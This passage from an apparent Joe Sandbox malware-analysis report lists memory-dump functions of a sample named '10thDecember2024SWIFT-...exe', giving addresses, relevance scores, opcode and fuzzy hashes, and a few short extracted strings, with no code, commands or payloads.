v, xrefs: 060C010F

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: 5548da45ffefbea5459c70a5def298327d6ae58f710d76fcf6cc525eb9f0a9e0
Instruction ID: 2b68f9418a694a6b4a39b1447df23cfb0e495ee6577b4c9985cd072a712c7c23
Opcode Fuzzy Hash: 5548da45ffefbea5459c70a5def298327d6ae58f710d76fcf6cc525eb9f0a9e0
Instruction Fuzzy Hash: 8431DFB1D056598FE75ECF2BCC4029ABBF7AFC5300F08C1FA8518AA265D6740A86CF54

Function 05FD13A5 Relevance: 1.1, Instructions: 1054COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc97101dc1970c4c8f341ad780b752f3345ee6cf50873e9c9244a8a37103a434
Instruction ID: 865da868a96775e5348ff19535bb743f5a47d09d8d5bd8b3c08200b28ef95bce
Opcode Fuzzy Hash: dc97101dc1970c4c8f341ad780b752f3345ee6cf50873e9c9244a8a37103a434
Instruction Fuzzy Hash: F282487451E3C4AFD7278B748C59B9A7F75AB03304F1A44DAE1809B2E3C678584ACB72

Function 05FD13F0 Relevance: 1.0, Instructions: 1030COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2340924209.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5fd0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0d840afb6b1550c17d2e039ebdbf16ae1c3e95d07a0e5e1cf55bd387c2a1315
Instruction ID: fa4a25436fc2bbdc542ca4de25358d776b2ac3752d76a9307be46f6de72abeb8
Opcode Fuzzy Hash: e0d840afb6b1550c17d2e039ebdbf16ae1c3e95d07a0e5e1cf55bd387c2a1315
Instruction Fuzzy Hash: 0382487451E3C4AFD7278B748C59B9A7F75AB03304F1A44DAE1809A2E3C678584ACB72

Function 060C65D8 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb41ca6f4de858c7ee747fbfee124b7b2d888623341595fc28464c6961b3e67
Instruction ID: a9cfc7fdfe13e6e5e1b52a3b5f88ca67c995dff7fd3614ef0fad5fda71eae77f
Opcode Fuzzy Hash: 6fb41ca6f4de858c7ee747fbfee124b7b2d888623341595fc28464c6961b3e67
Instruction Fuzzy Hash: 3312B270E106188FDB54CFAAC980A9EFBF2BF88314F24C569D419EB219D735A946CF50

Function 0634D8C8 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e203684b0ca42004019eafa14eb05a95f2b952867065cb615992b0435130fa
Instruction ID: 1f37cb37560d3ec839f6ea5299df01d49c19ca3d9352114c18ecc72f417c238c
Opcode Fuzzy Hash: 78e203684b0ca42004019eafa14eb05a95f2b952867065cb615992b0435130fa
Instruction Fuzzy Hash: 54E1F474915218CFDB54DFA4D954BADBBF1FF89300F1084A9D50AAB281CB396E88CF81

Function 0634D8D8 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5415351dc8b21ea97d74ca13456b098a07d3171bac782155cafaf388785937
Instruction ID: 0d6afcdbd36450dd402afbc43352b59bf8e871f93132bd0bd8938d3cec5c5c8e
Opcode Fuzzy Hash: 8d5415351dc8b21ea97d74ca13456b098a07d3171bac782155cafaf388785937
Instruction Fuzzy Hash: 1AE1E474915218CFDB54DFA4D954BADB7F5EF89300F1084A9D50AAB281CB396E88CF81

Function 060C6D93 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83562fb9eeb0e4051aca4e244f55b7e001766241f443f07c9d5dd35d8b05c493
Instruction ID: 92b2ab1a387a6bada160aeb4f2829e4856e9ea72be971c60cf3b212a3312b402
Opcode Fuzzy Hash: 83562fb9eeb0e4051aca4e244f55b7e001766241f443f07c9d5dd35d8b05c493
Instruction Fuzzy Hash: 79610A70D95218CFEBA4CFA5C944BADBBF2BF49310F20806AD409AB251D77A9985CF40

Function 06348338 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b982157b60846968315ed731fec078a241474fb48df9579902384c88e9ddb2c
Instruction ID: 5cc7e5b9700e96422d1016c8d03ddee937350c69719527e19d468138770555e6
Opcode Fuzzy Hash: 5b982157b60846968315ed731fec078a241474fb48df9579902384c88e9ddb2c
Instruction Fuzzy Hash: 215102B4D16208CFEB94DFA9D5447ADFBF6EF89304F209029D509A7241D778A989CF80

Function 06348348 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd1d0da4a8a81cd2c34e4f0fc38ae236ce4acbe2597edbbf1ef60ea320c3414
Instruction ID: 373e4aa29768daabf2242e75df6748cd9d6d8955937435eea25b6d06b6c06d12
Opcode Fuzzy Hash: 0cd1d0da4a8a81cd2c34e4f0fc38ae236ce4acbe2597edbbf1ef60ea320c3414
Instruction Fuzzy Hash: 025104B4D16208CFEB94DFA9D5447ADFBF6EB89304F209029D509A7241D778A985CF80

Function 060C65CB Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2cf92ea2cd55482a444acc710942ac7440a6dba172d46b6f13a4d55e1f46f4e
Instruction ID: 36b49aec8c1e88db45e77923c66fdaf181744b3d25b68e90200968a7122e7151
Opcode Fuzzy Hash: d2cf92ea2cd55482a444acc710942ac7440a6dba172d46b6f13a4d55e1f46f4e
Instruction Fuzzy Hash: 444175B5E016188BDB18CFABC94069EFBF3BFC8310F14C07AD918AB214EA3459458F54

Function 01511984 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2320332430.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a5c4555803c62b290579e560ac4e6e99091e33c75d68267f8333d052e03033a
Instruction ID: e2ad71c2cb67980d3a21ae3995eb7d5c78628f2781bb3cc0624ac21ef82d20ca
Opcode Fuzzy Hash: 6a5c4555803c62b290579e560ac4e6e99091e33c75d68267f8333d052e03033a
Instruction Fuzzy Hash: 524101B0D00348DFEB15CFA9D884BAEBBF1BB09310F20902AE815AB354D7749849CF84

Function 064A0006 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84c27dcebf991a287e5b70de040b9b3c0e89654c5055d1678409172b5b84071c
Instruction ID: ac1f99e26048e11da3a389e9b5f2687a9796ae17fcc7d3a3f0fcd333d1d9d041
Opcode Fuzzy Hash: 84c27dcebf991a287e5b70de040b9b3c0e89654c5055d1678409172b5b84071c
Instruction Fuzzy Hash: 74311E71D057948FE76ACF6ACC442D9BFF6AF85304F09C0EB9448AA256D6340A89CF61

Function 064A0040 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 726487080018942dc84f52f5e13a8714910027d48bc541c580eb8417cb26671c
Instruction ID: 1d1fb6a60185faa439091ce7358e81491c4d19094b2c90fabf39c17e19efe61b
Opcode Fuzzy Hash: 726487080018942dc84f52f5e13a8714910027d48bc541c580eb8417cb26671c
Instruction Fuzzy Hash: AF41C775E05669CBEB69CF5AC8486DDBBF6EF89304F40C0EA9408A7254DB340AC5CF51

Function 05FB0F88 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2340881992.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: true

Associated: 00000000.00000002.2340446288.0000000005E70000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e70000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ea09d2ac849df749ea7e8df3e93036ff9d700c202bb79412dd3876a43f7cd0
Instruction ID: 886dbee9c498b754dc112bea8c84ae942ef473c318297ee9ea2c3faa22554e5a
Opcode Fuzzy Hash: 84ea09d2ac849df749ea7e8df3e93036ff9d700c202bb79412dd3876a43f7cd0
Instruction Fuzzy Hash: 5A3184B1D05628CBEB68CF6BC95878AFAF7BFC9304F14C1A9C40CA6254DB740A858F01

Function 0634C2F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4331ada9e48a2657488cdc07feebd8ce2a19a62acde0bed20fac58d9ffa8c9de
Instruction ID: a2c2d72d1229af62e75936223c089647a131df90231f445c606ad4fbf5cd7c0a
Opcode Fuzzy Hash: 4331ada9e48a2657488cdc07feebd8ce2a19a62acde0bed20fac58d9ffa8c9de
Instruction Fuzzy Hash: A121B4B1E066188BEB58CFABD8443DEFBF7AFC8310F04D06AD408AA254DB7419458F91

Function 0634C2E1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342191199.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6340000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72bdff5a75f085123eece6f9abcf679356ff83faaf3e309aa9bf901e8619b3b4
Instruction ID: c2b180f3aa8a75a5f0a497bb9d57933244a2d8fe70708a11355b31a0c6137319
Opcode Fuzzy Hash: 72bdff5a75f085123eece6f9abcf679356ff83faaf3e309aa9bf901e8619b3b4
Instruction Fuzzy Hash: 7A21E8B1D066188BEB18CFABC8443DEFBF7AFC8300F04C4A9D448AA254DB7819468F51

Function 064BAA08 Relevance: 5.1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

(op, xrefs: 064BB54F
!, xrefs: 064BB5CB
(op, xrefs: 064BB539
\sp, xrefs: 064BB599

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: !$(op$(op$\sp
API String ID: 0-1137683985
Opcode ID: d88e6ad35e7407a00d0431526a8218769638d859332394c3276533325b35ad34
Instruction ID: a8f5d69b1020f923df1d288d2cafe6fe6181480cd29d68d32cb63e8eda29570b
Opcode Fuzzy Hash: d88e6ad35e7407a00d0431526a8218769638d859332394c3276533325b35ad34
Instruction Fuzzy Hash: 93314470E00228DFDB64CF19D8407EAB7B5FB8A300F0091A6845DA7340CB749E89CF62

Analysis Process: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exePID: 5280, Parent PID: 1028COMMON

Executed Functions

Function 00E81698 Relevance: 2.2, Strings: 1, Instructions: 943COMMON

Download Yara Rule

Strings

Dp, xrefs: 00E81727

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Dp
API String ID: 0-2141643023
Opcode ID: f28d656871104336876bedc61cfa571ddc178603477b9db4adb92ad5f194d094
Instruction ID: c8b1497ebe0fc32dda3197b31cd5606f80ec74fb11cec4967fa28e4068c21748
Opcode Fuzzy Hash: f28d656871104336876bedc61cfa571ddc178603477b9db4adb92ad5f194d094
Instruction Fuzzy Hash: 1F8226B1D083855FCB11DFB98CA459DBFF1EF81230B144B9EC0B9A72D2D624994ACB91

Function 00E811EF Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

Tep, xrefs: 00E812F6
Tep, xrefs: 00E812BD

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Tep$Tep
API String ID: 0-347264811
Opcode ID: 0dfddd4880db0c48ab8fb4f66d017b8a302686f4638b839c8031a7cec78cdeec
Instruction ID: 54e98e92939a22472f1b092dc2306ef6f683ea6973092d8a77f28f0382c147cd
Opcode Fuzzy Hash: 0dfddd4880db0c48ab8fb4f66d017b8a302686f4638b839c8031a7cec78cdeec
Instruction Fuzzy Hash: 65411B74B001048FCB44EFA8D999AAD7BF6BF89710F2554A9E80AEB361CA31DD05CB50

Function 00E81688 Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

Dp, xrefs: 00E81727

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID: Dp
API String ID: 0-2141643023
Opcode ID: 97d6063877a77f24c1c4156d652c7d8923be5f098c1aa928d888717de933a65b
Instruction ID: 46568fe25d9a7f35c30d3743a8210d3a7faa99df01565b20b07d2075f489d495
Opcode Fuzzy Hash: 97d6063877a77f24c1c4156d652c7d8923be5f098c1aa928d888717de933a65b
Instruction Fuzzy Hash: DE718D35A006109FCB18EF68D594A59BBF6FF88314F1581A9D44AEB3B1DB70EC42CB91

Function 00E84990 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e9da5ab64063b6280de4c3d50d05a8582e358c7de6a389311b86ab432a2106b
Instruction ID: c271291cd3fa9a03bba711aa5a9c75169520e47e128a4c1c7905f7f5aa6332f1
Opcode Fuzzy Hash: 8e9da5ab64063b6280de4c3d50d05a8582e358c7de6a389311b86ab432a2106b
Instruction Fuzzy Hash: E6216DB0909105DFEB00EFA9C4487ADBFF1EB45309F61D0AAD00CB72A5DB788A85CB41

Function 00E84C50 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 467e69752957ca63127518ebc0488f541c93e3c5467632e3b7a0f92fa201ecd7
Instruction ID: 4b21cafb95bcfc3b38d2e2494d257986c07a278dda215acd965b7a4fb133b493
Opcode Fuzzy Hash: 467e69752957ca63127518ebc0488f541c93e3c5467632e3b7a0f92fa201ecd7
Instruction Fuzzy Hash: E8118EB0909109DFEB00EF99C4487ADBAF5EB44309F61C0AAD00DB72A5DB788A84CB45

Function 00E80910 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65bd8ef7ee86c264ad9fabfa133fdae96e30f1a0f902b8b8bbbd27ced72c2bd
Instruction ID: 077b13542c04e7689931514eb825c06fcf0ae7290621866f574abd14d643afac
Opcode Fuzzy Hash: c65bd8ef7ee86c264ad9fabfa133fdae96e30f1a0f902b8b8bbbd27ced72c2bd
Instruction Fuzzy Hash: 1F11A5307047414FC751EB79C85566F7BE2AFD8304B10856DD90AEB369EF709D0A8B91

Function 00E80920 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc3f9425177a0d8f3f31970dec982ec29bfe57fe7667c0b6d36159180dc6dae
Instruction ID: 3d8900c656fff0a60765513da6f6aa55b3a656ba47f9427a777a1ae04bb061de
Opcode Fuzzy Hash: 4dc3f9425177a0d8f3f31970dec982ec29bfe57fe7667c0b6d36159180dc6dae
Instruction Fuzzy Hash: 45018C307006058FC751FB79C815A5F7BE6AFC8304B108468EA0AEB3A8EE70DD098B91

Function 00E80942 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198a32a4569a28f601bae50c3ca48b4acb39bf7d5c2b880b7aff4eace326285b
Instruction ID: 33cbb0eaf8966b8ec8f42010946f22b094b7e8705c61cb0e3e8d2df6b7ad884a
Opcode Fuzzy Hash: 198a32a4569a28f601bae50c3ca48b4acb39bf7d5c2b880b7aff4eace326285b
Instruction Fuzzy Hash: 20010831780105CFEB54EF25D959BAE77B1AFC8714F211098E10AEB2B2CB719D44DB60

Function 00E80AE8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 836d40ea184391c5e5287fb4e66aa1d245d727981f4ea5b10861d75ba73cd8b0
Instruction ID: 161611fe46011d2dec0f474f783dfe152c4a593441a7d2796c6e3a6b5c2947ba
Opcode Fuzzy Hash: 836d40ea184391c5e5287fb4e66aa1d245d727981f4ea5b10861d75ba73cd8b0
Instruction Fuzzy Hash: CD01ADB0A086818ED74ADB2688096E6BFE1BF45344F2EC6FAC04DAB023D770544A8B41

Function 00E81159 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348d3b3e9c83d81dcab11f41e2363b9e8c361c404cbd3811ba388e13710a983f
Instruction ID: 6b42fbfd21f76eb23bede61cf9f66f6d977ecce2d1f9b92c9698a7fa905559a6
Opcode Fuzzy Hash: 348d3b3e9c83d81dcab11f41e2363b9e8c361c404cbd3811ba388e13710a983f
Instruction Fuzzy Hash: F3F0BEB26142A04FD7429778E855A443BF0EF8A26030501D2E546CB3A6EA20DC068B52

Function 00E80BCA Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9f91671c00fc893b8aac6cfe896006ba0335d675847af31081f63cab47b938
Instruction ID: 95d57c56fe172aadab312a45271be66e5ccaa559e9b4c577b02cd721d18f02a7
Opcode Fuzzy Hash: 0b9f91671c00fc893b8aac6cfe896006ba0335d675847af31081f63cab47b938
Instruction Fuzzy Hash: F4F04471A08641CED749DF5688056E2BFE1BF9A340F5ED5F9C08E6B022D730554A9741

Function 00E8087A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7cfae712d8bedbc6e478933932840f16e25b257a3808078851c45fb8571c08
Instruction ID: 3afd92c507d44b6734079c6645350ca759a59bb1af5781758fcaed250051cc2b
Opcode Fuzzy Hash: 8c7cfae712d8bedbc6e478933932840f16e25b257a3808078851c45fb8571c08
Instruction Fuzzy Hash: 3CF03075D0EA84DFCB45FBF099551983BB0AA0230471142EAD849EB2A2D6B00E09D791

Function 00E847FB Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7facfc4d56f7a1d4eb0f3a8f4d0148240c8d205c53844536f0619611bc2b4cc6
Instruction ID: 1f7c8d94323f3fc2e609a3f6cf06c57fd215b0f6cc70c24c832a1700d5d8417d
Opcode Fuzzy Hash: 7facfc4d56f7a1d4eb0f3a8f4d0148240c8d205c53844536f0619611bc2b4cc6
Instruction Fuzzy Hash: 0EE0DF34B082940FC305FB78D4609693BF99F4A21430500DAE489EB3B3E960EC02C794

Function 00E81B97 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caff9817923ab49652313f2e6abc4e73d90faca2a871c17f6f844cd9bf434c32
Instruction ID: bdb930e37ab94cd39a12611f5c7e2c3c8db2429276d5337c0deb2f729b2c913b
Opcode Fuzzy Hash: caff9817923ab49652313f2e6abc4e73d90faca2a871c17f6f844cd9bf434c32
Instruction Fuzzy Hash: 81F03035700140DBDB08AB64D9449BD7376EB843A1F1082A9E51AAB3A0CA31DC029700

Function 00E80ECA Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b2c84e730bf6400666dc2576f81d453f6a9afa9e97ba166f22e8c7d7a892e4
Instruction ID: 7947a4ee6c9bd6aec57e1227b5deff294577a74301d066c6d9f37de29047f799
Opcode Fuzzy Hash: 05b2c84e730bf6400666dc2576f81d453f6a9afa9e97ba166f22e8c7d7a892e4
Instruction Fuzzy Hash: 06E0E5316287438FDBA5AF254C04299F7A4BB11360B51D6E4E42F72451D7209C8AD741

Function 00E80888 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f6db0596a133530bc35f071fd5babc9ec654b91a49c6dc43ad47405c8b398a
Instruction ID: 461ab53fbeaf3a3b23957d659fc0e85eeea968113bba9c9491d22126b600a3b9
Opcode Fuzzy Hash: 85f6db0596a133530bc35f071fd5babc9ec654b91a49c6dc43ad47405c8b398a
Instruction Fuzzy Hash: 9EE04F35D05608EFCB84FBF4D95559C77B5EB05300B1045A9D80EEB211DA701F04ABD1

Function 00E811B9 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3275291746.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e80000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30962bef5355ac136ee69e720186d7f7e1e09ff9638565fa3504d2791f769c5
Instruction ID: 12f06d3e71ca088f5e313e842777caa49ee87a4810edc1d7a84df7cd22b681fc
Opcode Fuzzy Hash: d30962bef5355ac136ee69e720186d7f7e1e09ff9638565fa3504d2791f769c5
Instruction Fuzzy Hash: 84E01235B052118FCB41ABF4D80C65D37B5AF4A25175041A2E846D7375DE25CC038795

Function 00E84808 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

